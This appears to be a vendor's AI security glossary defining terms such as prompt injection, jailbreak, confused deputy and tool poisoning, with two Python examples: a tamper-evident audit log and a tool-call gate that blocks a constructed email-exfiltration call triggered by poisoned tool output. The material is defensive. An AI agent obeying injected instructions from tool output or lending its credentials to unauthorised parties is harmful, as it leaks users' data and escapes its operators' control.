Glossary

AI security glossary.

Plain-language definitions for the AI Security Posture Management, LLM security, and AI-agent vocabulary that appears in review questions drawn from the EU AI Act, NIST AI 600-1, the OWASP LLM Top 10, the OWASP Agentic Top 10, and ISO/IEC 42001.

This glossary is maintained by Penaxtra, an enterprise AI Security Posture Management (AI-SPM) platform. Each entry carries a one-line definition for quick reference plus an extended explanation, related terms, and primary-source citations where applicable.

Adversarial Scan [Methodology]
A scheduled execution of probe templates against an LLM endpoint, agent, or RAG pipeline, scored to produce control-mapped findings.

AI Bill of Materials (AI-BOM) [Artefact]
A structured inventory of every AI component shipped with a product: models, embeddings, prompts, training datasets, agents, MCP servers, and tools.

AI Security Posture Management (AI-SPM) [Discipline, Category]
A continuous discipline that discovers, assesses, secures, and proves the compliance posture of AI systems, including LLM apps, agents, MCP servers, RAG pipelines, and vector databases.

Append-Only Audit Log [Control]
A tamper-evident log in which rows are only ever added, never updated or deleted; the canonical evidence store for regulatory audit trails.

Confused Deputy [Attack, OWASP Agentic]
A classic vulnerability pattern in which a privileged process is tricked into using its privilege on behalf of an unauthorised principal. It recurs in tool-calling AI agents: an agent that holds broad credentials can be steered by an untrusted party into invoking tools that party could not invoke itself.

Embedding [Component]
A dense numeric vector representation of text, image, or audio produced by an embedding model and used for similarity search and clustering.

Embedding Inversion [Attack, Privacy]
A privacy attack that reconstructs the original input text from a stored embedding vector.

Jailbreak [Attack]
A prompt designed to make an LLM produce output that the developer instructions or safety alignment were meant to prevent.

LLM Security Posture Management (LLM-SPM) [Discipline]
A focused layer within AI-SPM that covers prompt flows, model endpoints, and runtime controls for large language model applications.

MCP Server (Model Context Protocol) [Component, OWASP Agentic]
A server that exposes tools and resources to AI agents via the Model Context Protocol open standard; the set of tools it exposes is the security boundary.

Meta-Judge [Methodology]
A higher-capability LLM judge that resolves disagreement between primary judges in a multi-judge consensus pipeline.

Prompt Injection [Attack, OWASP LLM01]
An attack that smuggles attacker-controlled instructions into a model prompt to override the developer instructions or extract sensitive data. The injected text may arrive directly from the user or indirectly through retrieved documents and tool output.

Retrieval-Augmented Generation (RAG) [Pattern]
An LLM pattern in which the prompt is augmented with documents retrieved from a vector store at query time; the retriever and the corpus are the new attack surfaces.

Runtime AI Gateway [Control, Component]
A proxy between the application and the LLM provider that applies DLP, tool allowlisting, rate limiting, and signed policy rules in real time.

Sealed-Box Encryption [Cryptography]
An anonymous-sender public-key encryption construction (the libsodium sealed box: ephemeral X25519 key agreement with XSalsa20-Poly1305) in which the recipient can verify the integrity of the ciphertext but not the identity of the sender, and only the holder of the recipient secret key can decrypt.

Three-Judge Consensus [Methodology]
An adversarial-scan scoring pattern in which three independent frontier LLMs grade each finding and a fourth meta-judge resolves disagreement.

Tool Poisoning [Attack, OWASP Agentic]
An attack in which a malicious or compromised MCP tool returns crafted output designed to manipulate the agent calling it.

Vector Store [Component]
A database optimised for similarity search over high-dimensional embedding vectors; the canonical storage layer for RAG.
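The Append-Only Audit Log entry above calls the log "tamper-evident". The following is an added example (not code from this page or from Penaxtra) of the usual way that property is obtained: each row commits to the hash of the previous row, so editing, deleting or reordering a row breaks verification. The class and function names, the genesis value and the sample events are assumptions made for the example.

```python
"""Hash-chained append-only audit log (added illustration, not platform code).

Every row commits to the previous row's hash. Editing, deleting or reordering
a row after the fact breaks verification. The names, the genesis value and the
sample events are assumptions for this example.
"""
import dataclasses
import hashlib
import json
from typing import Any, Dict, List, Optional, Tuple

GENESIS_HASH = "0" * 64  # assumed anchor for the first row


@dataclasses.dataclass(frozen=True)
class AuditRow:
    seq: int               # position in the log, starting at 0
    event: Dict[str, Any]  # the audited event (tool call, finding, ...)
    prev_hash: str         # row_hash of the previous row, or GENESIS_HASH
    row_hash: str          # sha256 over (seq, event, prev_hash)


def row_digest(seq: int, event: Dict[str, Any], prev_hash: str) -> str:
    # Canonical JSON (sorted keys, no whitespace) so the same event always
    # serialises, and therefore hashes, identically.
    canonical = json.dumps({"seq": seq, "event": event, "prev": prev_hash},
                           sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(canonical).hexdigest()


class AppendOnlyLog:
    """Rows can only be appended; there is deliberately no update or delete."""

    def __init__(self) -> None:
        self._rows: List[AuditRow] = []

    def append(self, event: Dict[str, Any]) -> AuditRow:
        prev = self._rows[-1].row_hash if self._rows else GENESIS_HASH
        seq = len(self._rows)
        row = AuditRow(seq, event, prev, row_digest(seq, event, prev))
        self._rows.append(row)
        return row

    def rows(self) -> List[AuditRow]:
        return list(self._rows)

    def head(self) -> str:
        """Hash of the latest row; store or sign this outside the log itself."""
        return self._rows[-1].row_hash if self._rows else GENESIS_HASH


def verify_chain(rows: List[AuditRow],
                 expected_head: Optional[str] = None) -> Tuple[bool, Optional[int]]:
    """Return (ok, first_bad_seq). Recomputes every hash and every link.

    If expected_head is supplied (a head hash kept outside the log), a chain
    that was rewritten consistently from some row onward is also caught.
    """
    prev = GENESIS_HASH
    for position, row in enumerate(rows):
        if row.seq != position or row.prev_hash != prev:
            return False, position   # deleted, inserted or reordered row
        if row_digest(row.seq, row.event, row.prev_hash) != row.row_hash:
            return False, position   # row content edited in place
        prev = row.row_hash
    if expected_head is not None and prev != expected_head:
        return False, len(rows)      # consistent rewrite or truncation
    return True, None


def build_sample_log() -> AppendOnlyLog:
    """Constructed sample events; not real scan data."""
    log = AppendOnlyLog()
    log.append({"type": "scan.started", "target": "rag-pipeline-1"})
    log.append({"type": "finding", "control": "OWASP-LLM01", "severity": "high"})
    log.append({"type": "scan.finished", "findings": 1})
    return log


def tamper_edit(rows: List[AuditRow], seq: int,
                new_event: Dict[str, Any]) -> List[AuditRow]:
    """Simulate an attacker editing one row's content but not its hash."""
    out = list(rows)
    out[seq] = dataclasses.replace(rows[seq], event=new_event)
    return out


if __name__ == "__main__":
    log = build_sample_log()
    rows = log.rows()
    print("intact :", verify_chain(rows))
    print("edited :", verify_chain(tamper_edit(rows, 1, {"type": "finding", "severity": "low"})))
    print("deleted:", verify_chain(rows[:1] + rows[2:]))
```

The chain alone is not enough: an attacker with write access to the store can rebuild every row from the edited one onward and the chain will verify. That is why `verify_chain` accepts an `expected_head`; in practice the head hash is periodically signed, sent to a separate system, or written to a transparency log, and it is that external anchor, not the chain, that makes the log evidence rather than just a table.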
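The Confused Deputy, Tool Poisoning and Runtime AI Gateway entries describe the same failure from three angles: an agent holding broad credentials executes a tool call that was really requested by someone, or something, without the authority to make it. The following is an added example (not code from this page or from Penaxtra) of the check a gateway's tool allowlisting step needs. The naive gate asks only whether the agent's service account may call the tool; the hardened gate also requires the end user to hold the permission and refuses side-effecting tools when the instruction originated in tool output or a retrieved document rather than in the user's own request. All principals, tools, permissions and sample calls are assumptions made for the example.

```python
"""Confused-deputy check for a tool-calling agent (added illustration).

AGENT is the deputy: a service account with broad tool permissions. A tool
call may stem from the authenticated user's own request or from text the
model read in tool output or a retrieved document. Principals, tools,
permissions and the sample calls are assumptions for this example.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, Tuple


@dataclass(frozen=True)
class Principal:
    name: str
    permissions: FrozenSet[str]


@dataclass(frozen=True)
class ToolCall:
    tool: str
    args: Dict[str, str]
    # Provenance of the instruction that led to this call, as recorded by the
    # gateway's own tracking (never as reported by the model itself):
    # "user" for the end user's request, "tool_output" or "retrieved_doc"
    # for text the model read from an untrusted source.
    origin: str


# Hypothetical policy: the permission a caller needs for each tool, and
# which tools have effects outside the conversation.
TOOL_PERMISSIONS: Dict[str, str] = {
    "search_docs": "docs:read",
    "send_email": "email:send",
    "delete_record": "records:delete",
}
SIDE_EFFECTING_TOOLS: FrozenSet[str] = frozenset({"send_email", "delete_record"})
TRUSTED_ORIGINS: FrozenSet[str] = frozenset({"user"})


def authorize_naive(agent: Principal, call: ToolCall) -> Tuple[bool, str]:
    """Vulnerable gate: checks only the deputy's own privilege."""
    needed = TOOL_PERMISSIONS.get(call.tool)
    if needed is None:
        return False, "tool not on allowlist"
    if needed not in agent.permissions:
        return False, "agent lacks " + needed
    return True, "allowed"


def authorize(agent: Principal, user: Principal, call: ToolCall) -> Tuple[bool, str]:
    """Hardened gate: the requesting user's authority and the origin count too."""
    needed = TOOL_PERMISSIONS.get(call.tool)
    if needed is None:
        return False, "tool not on allowlist"
    if needed not in agent.permissions:
        return False, "agent lacks " + needed
    # Confused-deputy check: the principal on whose behalf the agent acts
    # must hold the permission itself, otherwise the agent is lending its
    # privilege to someone who does not have it.
    if needed not in user.permissions:
        return False, "user %s lacks %s" % (user.name, needed)
    # Tool-poisoning / indirect-injection check: side effects only on
    # instructions that came from the user, never from text the model read.
    if call.tool in SIDE_EFFECTING_TOOLS and call.origin not in TRUSTED_ORIGINS:
        return False, "side-effecting tool requested from untrusted origin " + call.origin
    return True, "allowed"


# Constructed principals and calls for the demonstration.
AGENT = Principal("support-agent-svc",
                  frozenset({"docs:read", "email:send", "records:delete"}))
ALICE = Principal("alice", frozenset({"docs:read"}))
BOB = Principal("bob", frozenset({"docs:read", "email:send"}))

SEARCH = ToolCall("search_docs", {"q": "refund policy"}, origin="user")
EXFIL = ToolCall("send_email",
                 {"to": "attacker@example.com", "body": "customer list attached"},
                 origin="tool_output")
LEGIT_MAIL = ToolCall("send_email",
                      {"to": "customer@example.com", "body": "your refund is approved"},
                      origin="user")
DELETE = ToolCall("delete_record", {"id": "42"}, origin="user")

if __name__ == "__main__":
    print("naive, exfil via poisoned tool:", authorize_naive(AGENT, EXFIL))
    print("hardened, alice, exfil        :", authorize(AGENT, ALICE, EXFIL))
    print("hardened, bob, exfil          :", authorize(AGENT, BOB, EXFIL))
    print("hardened, bob, legit mail     :", authorize(AGENT, BOB, LEGIT_MAIL))
    print("hardened, alice, delete       :", authorize(AGENT, ALICE, DELETE))
```

The `origin` field is the load-bearing part of the second check, and it only works if the gateway itself records where each piece of context came from (user turn, tool result, retrieved chunk) and carries that provenance through to the tool-call decision. A model asked to label its own instruction sources can be talked out of the label by the very injection the check is meant to stop.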
Primary sources

Every framework cited links back to its publisher.

Auditors verify our control mapping against the same documents we read. Each item below points to the canonical publication.

Last reviewed:

See the platform behind the vocabulary.

The AI-SPM platform that maps every finding to OWASP LLM, OWASP Agentic, NIST AI 600-1, MITRE ATLAS, EU AI Act, and ISO/IEC 42001.

AI-SPM overview